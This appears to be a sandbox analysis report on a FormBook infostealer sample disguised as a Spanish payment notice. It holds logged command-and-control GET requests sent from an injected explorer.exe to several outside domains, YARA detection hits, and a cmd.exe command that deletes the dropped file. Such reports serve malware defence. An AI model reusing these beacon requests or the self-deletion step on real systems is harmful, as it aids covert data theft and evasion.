                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                            May 13, 2022 16:46:41.058917999 CEST | 192.168.2.3 | 8.8.8.8 | 0xfaa7 | Standard query (0) | www.evertribute.com | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:46.489698887 CEST | 192.168.2.3 | 8.8.8.8 | 0x7032 | Standard query (0) | www.theguiriguide.com | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:51.974284887 CEST | 192.168.2.3 | 8.8.8.8 | 0x6a9a | Standard query (0) | www.team-ctctitleco.com | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:57.120481968 CEST | 192.168.2.3 | 8.8.8.8 | 0x1c73 | Standard query (0) | www.librevillegabon.com | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:47:02.828375101 CEST | 192.168.2.3 | 8.8.8.8 | 0xe13c | Standard query (0) | www.triptoasiam.com | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:47:10.203502893 CEST | 192.168.2.3 | 8.8.8.8 | 0x1b3 | Standard query (0) | www.massage-rino.com | A (IP address) | IN (0x0001)
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | www.evertribute.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST | 8.8.8.8 | 192.168.2.3 | 0xfaa7 | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST | 8.8.8.8 | 192.168.2.3 | 0x7032 | No error (0) | www.theguiriguide.com | theguiriguide.com | | CNAME (Canonical name) | IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST | 8.8.8.8 | 192.168.2.3 | 0x7032 | No error (0) | theguiriguide.com | | 192.0.78.25 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST | 8.8.8.8 | 192.168.2.3 | 0x7032 | No error (0) | theguiriguide.com | | 192.0.78.24 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:52.015516996 CEST | 8.8.8.8 | 192.168.2.3 | 0x6a9a | Name error (3) | www.team-ctctitleco.com | none | none | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:46:57.438465118 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c73 | No error (0) | www.librevillegabon.com | | 104.195.7.239 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:47:02.958780050 CEST | 8.8.8.8 | 192.168.2.3 | 0xe13c | No error (0) | www.triptoasiam.com | | 162.0.216.71 | A (IP address) | IN (0x0001)
                                            May 13, 2022 16:47:10.370362997 CEST | 8.8.8.8 | 192.168.2.3 | 0x1b3 | No error (0) | www.massage-rino.com | | 38.40.251.97 | A (IP address) | IN (0x0001)
                                            • www.evertribute.com
                                            • www.theguiriguide.com
                                            • www.librevillegabon.com
                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            0 | 192.168.2.3 | 49760 | 198.54.117.212 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            May 13, 2022 16:46:41.271711111 CEST | 8613 | OUT | GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.evertribute.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.3 | 49761 | 192.0.78.25 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            May 13, 2022 16:46:46.539707899 CEST | 8614 | OUT | GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.theguiriguide.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 13, 2022 16:46:46.708456039 CEST | 8614 | IN | HTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Fri, 13 May 2022 14:46:46 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: close
                                            Location: https://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb
                                            X-ac: 2.hhn _dfw
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            2 | 192.168.2.3 | 49764 | 104.195.7.239 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            May 13, 2022 16:46:57.630451918 CEST | 9314 | OUT | GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.librevillegabon.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 13, 2022 16:46:57.818396091 CEST | 9314 | IN | HTTP/1.1 200 OK
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                            X-Powered-By: Nginx
                                            Date: Fri, 13 May 2022 14:46:58 GMT
                                            Connection: close
                                            Data Raw: 33 0d 0a ef bb bf 0d 0a
                                            Data Ascii: 3



                                            Target ID:0
                                            Start time:16:44:56
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xb90000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Target ID:8
                                            Start time:16:45:17
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Imagebase:0xe10000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Target ID:11
                                            Start time:16:45:22
                                            Start date:13/05/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff6b8cf0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Target ID:14
                                            Start time:16:45:52
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\WWAHost.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                            Imagebase:0x1120000
                                            File size:829856 bytes
                                            MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Target ID:15
                                            Start time:16:45:57
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xc20000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:16
                                            Start time:16:45:58
                                            Start date:13/05/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7c9170000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            No disassembly